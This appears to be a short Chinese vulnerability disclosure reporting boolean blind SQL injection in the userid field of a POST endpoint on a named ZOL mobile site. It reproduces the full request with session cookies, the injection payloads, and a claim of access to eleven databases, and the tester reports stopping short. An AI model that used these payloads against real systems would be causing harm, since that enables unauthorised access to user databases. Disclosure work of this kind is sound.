中关村一处SQL注入(跨11库/疑似涉及用户数据库)
目标:lib.wap.zol.com.cn检测发现以下地方存在SQL注入:(POST中的userid,布尔盲注)
POST http://lib.wap.zol.com.cn/bbs/ios/checkCollect.php?vs=460 HTTP/1.1
Host: lib.wap.zol.com.cn
Content-Type: application/json
Accept: */*
Connection: keep-alive
Connection: keep-alive
Cookie: Hm_lvt_ae5edc2bc4fc71370807f6187f0a2dd0=1463824687; SSID=7232d39bb73f299; _ga=GA1.3.1803745104.1456412140; imei=0E415145-3D93-4AE8-A5DE-92F2302FDC8B; ip_ck=78CD5f3+j7QuODcyMjc5LjE0NTY0MTIxMzg%3D; lv=1463824686; userCityId=348; userCountyId=0; userLocationId=24; userProvinceId=30; vn=2; z_pro_city=s_provice%3Dguangdong%26s_city%3Dshenzhen; zolUserSignIn_45222733=2016-05-21%2C1%2C4; zol_userid=itwgiv
User-Agent: ZolSoft/4.6.0 (iPhone; iOS 9.3.2; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 99
{"bbs":"sjbbs","userid":"itwgiv","productid":"0","boardid":"33855"}
Payload:
"userid":"itwgiv' and 'a'='a"
"userid":"itwgiv' and 'a'='b"
1、当前数据库用户
2、所有数据库
注入点在userid,应该通往用户库了吧,为保数据安全,具体就不深入了。